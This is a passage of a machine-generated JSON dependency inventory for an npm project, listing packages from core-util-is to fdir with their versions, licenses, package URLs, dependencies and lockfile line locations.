[ { "StartLine": 4226, "EndLine": 4231 } ], "AnalyzedBy": "npm" }, { "ID": "core-util-is@1.0.3", "Name": "core-util-is", "Identifier": { "PURL": "pkg:npm/core-util-is@1.0.3", "UID": "c282bce9a7cb2697" }, "Version": "1.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4239, "EndLine": 4244 } ], "AnalyzedBy": "npm" }, { "ID": "cors@2.8.6", "Name": "cors", "Identifier": { "PURL": "pkg:npm/cors@2.8.6", "UID": "bbe2994275b68cb0" }, "Version": "2.8.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "object-assign@4.1.1", "vary@1.1.2" ], "Locations": [ { "StartLine": 4245, "EndLine": 4261 } ], "AnalyzedBy": "npm" }, { "ID": "cross-fetch@3.2.0", "Name": "cross-fetch", "Identifier": { "PURL": "pkg:npm/cross-fetch@3.2.0", "UID": "6f62ef99ddb4cb40" }, "Version": "3.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "node-fetch@2.7.0" ], "Locations": [ { "StartLine": 4269, "EndLine": 4277 } ], "AnalyzedBy": "npm" }, { "ID": "cross-spawn@7.0.6", "Name": "cross-spawn", "Identifier": { "PURL": "pkg:npm/cross-spawn@7.0.6", "UID": "87826261a744d7d0" }, "Version": "7.0.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "path-key@3.1.1", "shebang-command@2.0.0", "which@2.0.2" ], "Locations": [ { "StartLine": 4278, "EndLine": 4291 } ], "AnalyzedBy": "npm" }, { "ID": "crypto-js@4.2.0", "Name": "crypto-js", "Identifier": { "PURL": "pkg:npm/crypto-js@4.2.0", "UID": "39df18643050ea17" }, "Version": "4.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4292, "EndLine": 4297 } ], "AnalyzedBy": "npm" }, { "ID": "cssesc@3.0.0", "Name": "cssesc", "Identifier": { "PURL": "pkg:npm/cssesc@3.0.0", "UID": "5dff2095c5fb3dd6" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4298, "EndLine": 4309 } ], "AnalyzedBy": "npm" }, { "ID": "csstype@3.2.3", "Name": "csstype", "Identifier": { "PURL": "pkg:npm/csstype@3.2.3", "UID": "8eb9bdc050ee4ac5" }, "Version": "3.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4310, "EndLine": 4315 } ], "AnalyzedBy": "npm" }, { "ID": "d3-array@3.2.4", "Name": "d3-array", "Identifier": { "PURL": "pkg:npm/d3-array@3.2.4", "UID": "6d4d570a45eb3e35" }, "Version": "3.2.4", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "internmap@2.0.3" ], "Locations": [ { "StartLine": 4316, "EndLine": 4327 } ], "AnalyzedBy": "npm" }, { "ID": "d3-color@3.1.0", "Name": "d3-color", "Identifier": { "PURL": "pkg:npm/d3-color@3.1.0", "UID": "58725878eb3acec2" }, "Version": "3.1.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4328, "EndLine": 4336 } ], "AnalyzedBy": "npm" }, { "ID": "d3-ease@3.0.1", "Name": "d3-ease", "Identifier": { "PURL": "pkg:npm/d3-ease@3.0.1", "UID": "89ab479ea18eebd5" }, "Version": "3.0.1", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4337, "EndLine": 4345 } ], "AnalyzedBy": "npm" }, { "ID": "d3-format@3.1.2", "Name": "d3-format", "Identifier": { "PURL": "pkg:npm/d3-format@3.1.2", "UID": "187a755e05ee20c3" }, "Version": "3.1.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4346, "EndLine": 4354 } ], "AnalyzedBy": "npm" }, { "ID": "d3-interpolate@3.0.1", "Name": "d3-interpolate", "Identifier": { "PURL": "pkg:npm/d3-interpolate@3.0.1", "UID": "58e3f9a6afa20b63" }, "Version": "3.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "d3-color@3.1.0" ], "Locations": [ { "StartLine": 4355, "EndLine": 4366 } ], "AnalyzedBy": "npm" }, { "ID": "d3-path@3.1.0", "Name": "d3-path", "Identifier": { "PURL": "pkg:npm/d3-path@3.1.0", "UID": "ca6858178c7bfb0f" }, "Version": "3.1.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4367, "EndLine": 4375 } ], "AnalyzedBy": "npm" }, { "ID": "d3-scale@4.0.2", "Name": "d3-scale", "Identifier": { "PURL": "pkg:npm/d3-scale@4.0.2", "UID": "ab0b3928ecc64368" }, "Version": "4.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "d3-array@3.2.4", "d3-format@3.1.2", "d3-interpolate@3.0.1", "d3-time-format@4.1.0", "d3-time@3.1.0" ], "Locations": [ { "StartLine": 4376, "EndLine": 4391 } ], "AnalyzedBy": "npm" }, { "ID": "d3-shape@3.2.0", "Name": "d3-shape", "Identifier": { "PURL": "pkg:npm/d3-shape@3.2.0", "UID": "179ced7621d12a81" }, "Version": "3.2.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "d3-path@3.1.0" ], "Locations": [ { "StartLine": 4392, "EndLine": 4403 } ], "AnalyzedBy": "npm" }, { "ID": "d3-time@3.1.0", "Name": "d3-time", "Identifier": { "PURL": "pkg:npm/d3-time@3.1.0", "UID": "ddf68c220fcf68a4" }, "Version": "3.1.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "d3-array@3.2.4" ], "Locations": [ { "StartLine": 4404, "EndLine": 4415 } ], "AnalyzedBy": "npm" }, { "ID": "d3-time-format@4.1.0", "Name": "d3-time-format", "Identifier": { "PURL": "pkg:npm/d3-time-format@4.1.0", "UID": "547928f13212328f" }, "Version": "4.1.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "d3-time@3.1.0" ], "Locations": [ { "StartLine": 4416, "EndLine": 4427 } ], "AnalyzedBy": "npm" }, { "ID": "d3-timer@3.0.1", "Name": "d3-timer", "Identifier": { "PURL": "pkg:npm/d3-timer@3.0.1", "UID": "95f8f4d00521c839" }, "Version": "3.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4428, "EndLine": 4436 } ], "AnalyzedBy": "npm" }, { "ID": "dayjs@1.11.20", "Name": "dayjs", "Identifier": { "PURL": "pkg:npm/dayjs@1.11.20", "UID": "e5966cc27d5f1a2f" }, "Version": "1.11.20", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4437, "EndLine": 4442 } ], "AnalyzedBy": "npm" }, { "ID": "debug@2.6.9", "Name": "debug", "Identifier": { "PURL": "pkg:npm/debug@2.6.9", "UID": "548fabf9b3b50691" }, "Version": "2.6.9", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ms@2.0.0" ], "Locations": [ { "StartLine": 3721, "EndLine": 3729 }, { "StartLine": 5295, "EndLine": 5303 }, { "StartLine": 5498, "EndLine": 5506 }, { "StartLine": 7154, "EndLine": 7162 }, { "StartLine": 8849, "EndLine": 8857 } ], "AnalyzedBy": "npm" }, { "ID": "debug@4.4.3", "Name": "debug", "Identifier": { "PURL": "pkg:npm/debug@4.4.3", "UID": "e6a3b087d45c93ce" }, "Version": "4.4.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ms@2.1.3" ], "Locations": [ { "StartLine": 4443, "EndLine": 4459 } ], "AnalyzedBy": "npm" }, { "ID": "decamelize@1.2.0", "Name": "decamelize", "Identifier": { "PURL": "pkg:npm/decamelize@1.2.0", "UID": "bf8d7cfcaf329a71" }, "Version": "1.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4460, "EndLine": 4468 } ], "AnalyzedBy": "npm" }, { "ID": "decimal.js-light@2.5.1", "Name": "decimal.js-light", "Identifier": { "PURL": "pkg:npm/decimal.js-light@2.5.1", "UID": "74f42d37d77d1ac8" }, "Version": "2.5.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4469, "EndLine": 4474 } ], "AnalyzedBy": "npm" }, { "ID": "deepmerge@4.3.1", "Name": "deepmerge", "Identifier": { "PURL": "pkg:npm/deepmerge@4.3.1", "UID": "a4377e2cca96d504" }, "Version": "4.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4495, "EndLine": 4503 } ], "AnalyzedBy": "npm" }, { "ID": "delayed-stream@1.0.0", "Name": "delayed-stream", "Identifier": { "PURL": "pkg:npm/delayed-stream@1.0.0", "UID": "67085ac34a7e299e" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4504, "EndLine": 4512 } ], "AnalyzedBy": "npm" }, { "ID": "denque@2.1.0", "Name": "denque", "Identifier": { "PURL": "pkg:npm/denque@2.1.0", "UID": "dfc3f320de2c9473" }, "Version": "2.1.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4513, "EndLine": 4521 } ], "AnalyzedBy": "npm" }, { "ID": "depd@2.0.0", "Name": "depd", "Identifier": { "PURL": "pkg:npm/depd@2.0.0", "UID": "1da92b3ff3fc3d41" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4522, "EndLine": 4530 } ], "AnalyzedBy": "npm" }, { "ID": "destroy@1.2.0", "Name": "destroy", "Identifier": { "PURL": "pkg:npm/destroy@1.2.0", "UID": "66f597e3ee331c3b" }, "Version": "1.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4531, "EndLine": 4540 } ], "AnalyzedBy": "npm" }, { "ID": "detect-libc@2.1.2", "Name": "detect-libc", "Identifier": { "PURL": "pkg:npm/detect-libc@2.1.2", "UID": "f1a366f4bcb78238" }, "Version": "2.1.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4541, "EndLine": 4549 } ], "AnalyzedBy": "npm" }, { "ID": "dfa@1.2.0", "Name": "dfa", "Identifier": { "PURL": "pkg:npm/dfa@1.2.0", "UID": "d8f21e0fd40f177e" }, "Version": "1.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4561, "EndLine": 4566 } ], "AnalyzedBy": "npm" }, { "ID": "didyoumean@1.2.2", "Name": "didyoumean", "Identifier": { "PURL": "pkg:npm/didyoumean@1.2.2", "UID": "998677f79bbfc962" }, "Version": "1.2.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4567, "EndLine": 4572 } ], "AnalyzedBy": "npm" }, { "ID": "dijkstrajs@1.0.3", "Name": "dijkstrajs", "Identifier": { "PURL": "pkg:npm/dijkstrajs@1.0.3", "UID": "e9f1fbd8d50ca204" }, "Version": "1.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4593, "EndLine": 4598 } ], "AnalyzedBy": "npm" }, { "ID": "dlv@1.1.3", "Name": "dlv", "Identifier": { "PURL": "pkg:npm/dlv@1.1.3", "UID": "b3d56ddae9e54844" }, "Version": "1.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4599, "EndLine": 4604 } ], "AnalyzedBy": "npm" }, { "ID": "dom-helpers@5.2.1", "Name": "dom-helpers", "Identifier": { "PURL": "pkg:npm/dom-helpers@5.2.1", "UID": "c712a39795eff141" }, "Version": "5.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/runtime@7.29.2", "csstype@3.2.3" ], "Locations": [ { "StartLine": 4618, "EndLine": 4627 } ], "AnalyzedBy": "npm" }, { "ID": "dom-serializer@2.0.0", "Name": "dom-serializer", "Identifier": { "PURL": "pkg:npm/dom-serializer@2.0.0", "UID": "74ee4dc5dee4ba46" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "domelementtype@2.3.0", "domhandler@5.0.3", "entities@4.5.0" ], "Locations": [ { "StartLine": 4628, "EndLine": 4641 } ], "AnalyzedBy": "npm" }, { "ID": "domelementtype@2.3.0", "Name": "domelementtype", "Identifier": { "PURL": "pkg:npm/domelementtype@2.3.0", "UID": "9f0efdd288a8c58d" }, "Version": "2.3.0", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4642, "EndLine": 4653 } ], "AnalyzedBy": "npm" }, { "ID": "domhandler@5.0.3", "Name": "domhandler", "Identifier": { "PURL": "pkg:npm/domhandler@5.0.3", "UID": "b6edd45a9328e769" }, "Version": "5.0.3", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "domelementtype@2.3.0" ], "Locations": [ { "StartLine": 4654, "EndLine": 4668 } ], "AnalyzedBy": "npm" }, { "ID": "domutils@3.2.2", "Name": "domutils", "Identifier": { "PURL": "pkg:npm/domutils@3.2.2", "UID": "586625ab6548cde7" }, "Version": "3.2.2", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "dom-serializer@2.0.0", "domelementtype@2.3.0", "domhandler@5.0.3" ], "Locations": [ { "StartLine": 4669, "EndLine": 4682 } ], "AnalyzedBy": "npm" }, { "ID": "dunder-proto@1.0.1", "Name": "dunder-proto", "Identifier": { "PURL": "pkg:npm/dunder-proto@1.0.1", "UID": "caa1c5fe4eacf59" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "call-bind-apply-helpers@1.0.2", "es-errors@1.3.0", "gopd@1.2.0" ], "Locations": [ { "StartLine": 4683, "EndLine": 4696 } ], "AnalyzedBy": "npm" }, { "ID": "duplexify@4.1.3", "Name": "duplexify", "Identifier": { "PURL": "pkg:npm/duplexify@4.1.3", "UID": "ce9a36455bc13238" }, "Version": "4.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "end-of-stream@1.4.5", "inherits@2.0.4", "readable-stream@3.6.2", "stream-shift@1.0.3" ], "Locations": [ { "StartLine": 4697, "EndLine": 4709 } ], "AnalyzedBy": "npm" }, { "ID": "eastasianwidth@0.2.0", "Name": "eastasianwidth", "Identifier": { "PURL": "pkg:npm/eastasianwidth@0.2.0", "UID": "4fe58d52d331c63c" }, "Version": "0.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4720, "EndLine": 4725 } ], "AnalyzedBy": "npm" }, { "ID": "ecdsa-sig-formatter@1.0.11", "Name": "ecdsa-sig-formatter", "Identifier": { "PURL": "pkg:npm/ecdsa-sig-formatter@1.0.11", "UID": "e12afe03cccb0f" }, "Version": "1.0.11", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "safe-buffer@5.2.1" ], "Locations": [ { "StartLine": 4726, "EndLine": 4734 } ], "AnalyzedBy": "npm" }, { "ID": "editorconfig@1.0.7", "Name": "editorconfig", "Identifier": { "PURL": "pkg:npm/editorconfig@1.0.7", "UID": "47246deb634f5a16" }, "Version": "1.0.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@one-ini/wasm@0.1.1", "commander@10.0.1", "minimatch@9.0.9", "semver@7.7.4" ], "Locations": [ { "StartLine": 4735, "EndLine": 4752 } ], "AnalyzedBy": "npm" }, { "ID": "ee-first@1.1.1", "Name": "ee-first", "Identifier": { "PURL": "pkg:npm/ee-first@1.1.1", "UID": "37d7854e90676854" }, "Version": "1.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4777, "EndLine": 4782 } ], "AnalyzedBy": "npm" }, { "ID": "electron-to-chromium@1.5.345", "Name": "electron-to-chromium", "Identifier": { "PURL": "pkg:npm/electron-to-chromium@1.5.345", "UID": "a1d66703431b62aa" }, "Version": "1.5.345", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4783, "EndLine": 4788 } ], "AnalyzedBy": "npm" }, { "ID": "emoji-regex@10.6.0", "Name": "emoji-regex", "Identifier": { "PURL": "pkg:npm/emoji-regex@10.6.0", "UID": "c1aa8f0b64cbd63e" }, "Version": "10.6.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4789, "EndLine": 4794 } ], "AnalyzedBy": "npm" }, { "ID": "emoji-regex@8.0.0", "Name": "emoji-regex", "Identifier": { "PURL": "pkg:npm/emoji-regex@8.0.0", "UID": "21f72324e410c5a7" }, "Version": "8.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9245, "EndLine": 9250 }, { "StartLine": 9251, "EndLine": 9256 } ], "AnalyzedBy": "npm" }, { "ID": "emoji-regex@9.2.2", "Name": "emoji-regex", "Identifier": { "PURL": "pkg:npm/emoji-regex@9.2.2", "UID": "6c8187854ba26ed" }, "Version": "9.2.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1462, "EndLine": 1467 } ], "AnalyzedBy": "npm" }, { "ID": "encodeurl@2.0.0", "Name": "encodeurl", "Identifier": { "PURL": "pkg:npm/encodeurl@2.0.0", "UID": "412e2fc13b372e4c" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4795, "EndLine": 4803 } ], "AnalyzedBy": "npm" }, { "ID": "end-of-stream@1.4.5", "Name": "end-of-stream", "Identifier": { "PURL": "pkg:npm/end-of-stream@1.4.5", "UID": "f8f295ff3dbce53f" }, "Version": "1.4.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "once@1.4.0" ], "Locations": [ { "StartLine": 4804, "EndLine": 4813 } ], "AnalyzedBy": "npm" }, { "ID": "engine.io@6.6.7", "Name": "engine.io", "Identifier": { "PURL": "pkg:npm/engine.io@6.6.7", "UID": "93d7596aa6da915b" }, "Version": "6.6.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/cors@2.8.19", "@types/node@20.19.39", "@types/ws@8.18.1", "accepts@1.3.8", "base64id@2.0.0", "cookie@0.7.2", "cors@2.8.6", "debug@4.4.3", "engine.io-parser@5.2.3", "ws@8.18.3" ], "Locations": [ { "StartLine": 4814, "EndLine": 4834 } ], "AnalyzedBy": "npm" }, { "ID": "engine.io-client@6.6.4", "Name": "engine.io-client", "Identifier": { "PURL": "pkg:npm/engine.io-client@6.6.4", "UID": "69ff8d19d46faf13" }, "Version": "6.6.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@socket.io/component-emitter@3.1.2", "debug@4.4.3", "engine.io-parser@5.2.3", "ws@8.18.3", "xmlhttprequest-ssl@2.1.2" ], "Locations": [ { "StartLine": 4835, "EndLine": 4847 } ], "AnalyzedBy": "npm" }, { "ID": "engine.io-parser@5.2.3", "Name": "engine.io-parser", "Identifier": { "PURL": "pkg:npm/engine.io-parser@5.2.3", "UID": "f5851cec59a0048f" }, "Version": "5.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4848, "EndLine": 4856 } ], "AnalyzedBy": "npm" }, { "ID": "entities@4.5.0", "Name": "entities", "Identifier": { "PURL": "pkg:npm/entities@4.5.0", "UID": "4aa0f3667b580141" }, "Version": "4.5.0", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4866, "EndLine": 4877 } ], "AnalyzedBy": "npm" }, { "ID": "es-define-property@1.0.1", "Name": "es-define-property", "Identifier": { "PURL": "pkg:npm/es-define-property@1.0.1", "UID": "d648ff935e5e2d70" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4878, "EndLine": 4886 } ], "AnalyzedBy": "npm" }, { "ID": "es-errors@1.3.0", "Name": "es-errors", "Identifier": { "PURL": "pkg:npm/es-errors@1.3.0", "UID": "d9b9d68627d33ff7" }, "Version": "1.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4887, "EndLine": 4895 } ], "AnalyzedBy": "npm" }, { "ID": "es-object-atoms@1.1.1", "Name": "es-object-atoms", "Identifier": { "PURL": "pkg:npm/es-object-atoms@1.1.1", "UID": "667ec5191acf337d" }, "Version": "1.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "es-errors@1.3.0" ], "Locations": [ { "StartLine": 4896, "EndLine": 4907 } ], "AnalyzedBy": "npm" }, { "ID": "es-set-tostringtag@2.1.0", "Name": "es-set-tostringtag", "Identifier": { "PURL": "pkg:npm/es-set-tostringtag@2.1.0", "UID": "c55d91bda6f8893" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "es-errors@1.3.0", "get-intrinsic@1.3.0", "has-tostringtag@1.0.2", "hasown@2.0.3" ], "Locations": [ { "StartLine": 4908, "EndLine": 4922 } ], "AnalyzedBy": "npm" }, { "ID": "escalade@3.2.0", "Name": "escalade", "Identifier": { "PURL": "pkg:npm/escalade@3.2.0", "UID": "51ddaf3a991dc191" }, "Version": "3.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4962, "EndLine": 4970 } ], "AnalyzedBy": "npm" }, { "ID": "escape-html@1.0.3", "Name": "escape-html", "Identifier": { "PURL": "pkg:npm/escape-html@1.0.3", "UID": "27b37114cf659f09" }, "Version": "1.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4971, "EndLine": 4976 } ], "AnalyzedBy": "npm" }, { "ID": "etag@1.8.1", "Name": "etag", "Identifier": { "PURL": "pkg:npm/etag@1.8.1", "UID": "e38fa6e6a581bff7" }, "Version": "1.8.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5151, "EndLine": 5159 } ], "AnalyzedBy": "npm" }, { "ID": "event-target-shim@5.0.1", "Name": "event-target-shim", "Identifier": { "PURL": "pkg:npm/event-target-shim@5.0.1", "UID": "65b0b583fde660e3" }, "Version": "5.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5160, "EndLine": 5169 } ], "AnalyzedBy": "npm" }, { "ID": "eventemitter3@4.0.7", "Name": "eventemitter3", "Identifier": { "PURL": "pkg:npm/eventemitter3@4.0.7", "UID": "ec6278d2501dfffb" }, "Version": "4.0.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5170, "EndLine": 5175 } ], "AnalyzedBy": "npm" }, { "ID": "events@3.3.0", "Name": "events", "Identifier": { "PURL": "pkg:npm/events@3.3.0", "UID": "5fd4d4188addbb14" }, "Version": "3.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5176, "EndLine": 5184 } ], "AnalyzedBy": "npm" }, { "ID": "express@4.22.1", "Name": "express", "Identifier": { "PURL": "pkg:npm/express@4.22.1", "UID": "37dea9f0ee7a4df2" }, "Version": "4.22.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "accepts@1.3.8", "array-flatten@1.1.1", "body-parser@1.20.5", "content-disposition@0.5.4", "content-type@1.0.5", "cookie-signature@1.0.7", "cookie@0.7.2", "debug@2.6.9", "depd@2.0.0", "encodeurl@2.0.0", "escape-html@1.0.3", "etag@1.8.1", "finalhandler@1.3.2", "fresh@0.5.2", "http-errors@2.0.1", "merge-descriptors@1.0.3", "methods@1.1.2", "on-finished@2.4.1", "parseurl@1.3.3", "path-to-regexp@0.1.13", "proxy-addr@2.0.7", "qs@6.14.2", "range-parser@1.2.1", "safe-buffer@5.2.1", "send@0.19.2", "serve-static@1.16.3", "setprototypeof@1.2.0", "statuses@2.0.2", "type-is@1.6.18", "utils-merge@1.0.1", "vary@1.1.2" ], "Locations": [ { "StartLine": 5222, "EndLine": 5267 } ], "AnalyzedBy": "npm" }, { "ID": "express-rate-limit@8.5.1", "Name": "express-rate-limit", "Identifier": { "PURL": "pkg:npm/express-rate-limit@8.5.1", "UID": "e5229dbb6b303f6e" }, "Version": "8.5.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "express@4.22.1", "ip-address@10.2.0" ], "Locations": [ { "StartLine": 5268, "EndLine": 5285 } ], "AnalyzedBy": "npm" }, { "ID": "extend@3.0.2", "Name": "extend", "Identifier": { "PURL": "pkg:npm/extend@3.0.2", "UID": "6a213abedd250e4" }, "Version": "3.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5310, "EndLine": 5316 } ], "AnalyzedBy": "npm" }, { "ID": "farmhash-modern@1.1.0", "Name": "farmhash-modern", "Identifier": { "PURL": "pkg:npm/farmhash-modern@1.1.0", "UID": "c94b78c0e4b500b3" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5317, "EndLine": 5325 } ], "AnalyzedBy": "npm" }, { "ID": "fast-deep-equal@2.0.1", "Name": "fast-deep-equal", "Identifier": { "PURL": "pkg:npm/fast-deep-equal@2.0.1", "UID": "45cd262227926e74" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8426, "EndLine": 8431 } ], "AnalyzedBy": "npm" }, { "ID": "fast-deep-equal@3.1.3", "Name": "fast-deep-equal", "Identifier": { "PURL": "pkg:npm/fast-deep-equal@3.1.3", "UID": "21d3ad4bc7795cf9" }, "Version": "3.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5326, "EndLine": 5331 } ], "AnalyzedBy": "npm" }, { "ID": "fast-equals@5.4.0", "Name": "fast-equals", "Identifier": { "PURL": "pkg:npm/fast-equals@5.4.0", "UID": "f701a24fcb56e8f2" }, "Version": "5.4.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5332, "EndLine": 5340 } ], "AnalyzedBy": "npm" }, { "ID": "fast-glob@3.3.3", "Name": "fast-glob", "Identifier": { "PURL": "pkg:npm/fast-glob@3.3.3", "UID": "954d4bf2ec4c89b5" }, "Version": "3.3.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@nodelib/fs.stat@2.0.5", "@nodelib/fs.walk@1.2.8", "glob-parent@5.1.2", "merge2@1.4.1", "micromatch@4.0.8" ], "Locations": [ { "StartLine": 5341, "EndLine": 5356 } ], "AnalyzedBy": "npm" }, { "ID": "fast-xml-builder@1.1.5", "Name": "fast-xml-builder", "Identifier": { "PURL": "pkg:npm/fast-xml-builder@1.1.5", "UID": "bcd6b653d167fc58" }, "Version": "1.1.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "path-expression-matcher@1.5.0" ], "Locations": [ { "StartLine": 5390, "EndLine": 5405 } ], "AnalyzedBy": "npm" }, { "ID": "fast-xml-parser@5.7.2", "Name": "fast-xml-parser", "Identifier": { "PURL": "pkg:npm/fast-xml-parser@5.7.2", "UID": "7a0a0cac8b7f610" }, "Version": "5.7.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@nodable/entities@2.1.0", "fast-xml-builder@1.1.5", "path-expression-matcher@1.5.0", "strnum@2.2.3" ], "Locations": [ { "StartLine": 5406, "EndLine": 5427 } ], "AnalyzedBy": "npm" }, { "ID": "fastq@1.20.1", "Name": "fastq", "Identifier": { "PURL": "pkg:npm/fastq@1.20.1", "UID": "cc53265edd4e124e" }, "Version": "1.20.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "reusify@1.1.0" ], "Locations": [ { "StartLine": 5428, "EndLine": 5436 } ], "AnalyzedBy": "npm" }, { "ID": "faye-websocket@0.11.4", "Name": "faye-websocket", "Identifier": { "PURL": "pkg:npm/faye-websocket@0.11.4", "UID": "840bfdc12aefaaf1" }, "Version": "0.11.4", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "websocket-driver@0.7.4" ], "Locations": [ { "StartLine": 5437, "EndLine": 5448 } ], "AnalyzedBy": "npm" }, { "ID": "fdir@6.5.0", "Name": "fdir", "Identifier": { "PURL": "pkg:npm/fdir@6.5.0", "UID": "7c24b6ed0a9c8c10" }, "Version": 